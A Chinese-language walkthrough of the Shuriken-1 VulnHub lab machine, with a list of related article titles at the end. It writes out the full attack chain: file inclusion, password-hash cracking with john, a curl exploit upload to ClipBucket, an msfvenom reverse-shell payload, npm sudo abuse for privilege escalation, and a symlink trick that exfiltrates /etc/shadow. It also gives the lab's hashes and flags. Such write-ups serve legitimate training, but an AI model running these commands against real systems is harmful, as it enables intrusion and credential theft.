Shuriken-1靶机总结
Shuriken-1靶机渗透总结
靶机下载地址:
https://download.vulnhub.com/shuriken/Shuriken-1.ova
将Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口
通过开放的80端口,打开网站
信息收集,发现js文件存在两个链接
尝试去打开链接,发现了一个存在文件包含的地方
Broadcas.shuriken.local无法直接打开,需要加到hosts文件中
打开网站后发现需要登录
尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码
/etc/apache2/sites-enabled/000-default.conf
读取到了密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
接下来就是对密码的破解,这里利用john工具
john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash john --show /home/kali/Desktop/hash
破解后的密码: 9972761drmfsls
并且登录后发现是ClipBucket 4.0
尝试去网上搜寻符合符合的漏洞,在exploit网站找到一个,可以文件上传的exploit
curl --basic --user "developers:9972761drmfsls" -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/beats_uploader.php
准备要上传的文件,这里上传一个msfvenom生成的shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o /home/kali/Desktop/shell.php
通过上传成功后返回的文件名和后缀加路径,可以找到上传的php文件,并且运行
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
在kali里面利用msf开启监听,成功连接shuriken靶机
当前用户是www-data,考虑提权,经过发现,使用sudo –l 命令
看到了server-management用户无密码使用npm命令,存在sudo滥用提权
并且在https://gtfobins.github.io/找到了对应的提权命令touch package.json echo '{"scripts":{"dev":"/bin/bash"}}' > package.json sudo -u server-management npm run dev
成功提权到server-management用户
在server-management用户的家目录下发现了user.txt
获得了第一个flag
67528b07b382dfaa490f4dffc57dcdc0
紧接着考虑提权至root的方法
这里没有找到提权的方法
但是发现了一个奇怪的进程
经过查看backupsrv.sh内容
大概理解这个进程的作用是,在/var/backups目录下生成一个tgz文件
文件名字是时间和主机名字的组合
并且tgz文件的内容是/home/server-management/Documents目录里面的内容
利用这点,我们可以下载/etc的文件
观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents文件夹,做了/etc到Documents的软连接,压缩成功后将其拷贝到/var/www/main(注意:需切换到www-data用户),下载后获取到shadow文件
cp /var/backups/shuriken-Sunday.tgz /var/www/main
下载之后,对应的tgz文件内容是对应的/etc的文件内容,在里面打开了shadow文件,获取了root的密码,但是这里不会解密
$6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0
无法解密,直接同步骤将/root文件下载下来,打开里面的root.txt文件
获取了第二个flag
d0f9655a4454ac54e3002265d40b2edd
Shuriken-1靶机总结相关推荐
- 靶机渗透练习90-Grotesque:1.0.1
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- HA: InfinityStones靶机渗透测试
文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- HA: Dhanush靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...
- Lampiao靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...
- 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器
这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...
- docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介
在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...
- php %3c php 攻击,web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
最新文章
- 深入浅出ShellExecute(总结)
- TensorFlow实验(3)
- stylus 设置全局样式_在vue-cli 3中, 给stylus、sass样式传入共享的全局变量
- 连接mysql出现Access denied for user ‘root’@’localhost’ (using password:YES)问题解决办法...
- 祝贺泰山OFFICE CDKEY长度25,吾已成为顶级CDKEY砖家
- 大学生学计算机笔记本配置,上大学该买什么笔记本?推荐给准大学生的几款本...
- 个性字体头像在线图片生成下载网址
- 纯HTML5后台模板
- 2020 android平板推荐,2020年2000元左右的平板哪一款好?2000元左右的平板推荐
- 简述linux操作系统的功能是什么,什么是Linux操作系统及其功能
- 灼口综合征的症状这么多呢呀?!
- 基于C++的UKF代码示例,跟踪三次多项式曲线
- C#-MSDN学习提高
- Python各版本安装包下载
- QQ群加入代码在线获取
- Flash按键响应-键码值表
- nginx是什么?有什么用?
- 风华才气,春华秋实———忆信管学子杨友岁月如歌
- 苹果系列手机清除的文件如何恢复的呢
- 5g无线图传信号测试软件,5G时代,移动无线图传网络构架和无线图传传输技术...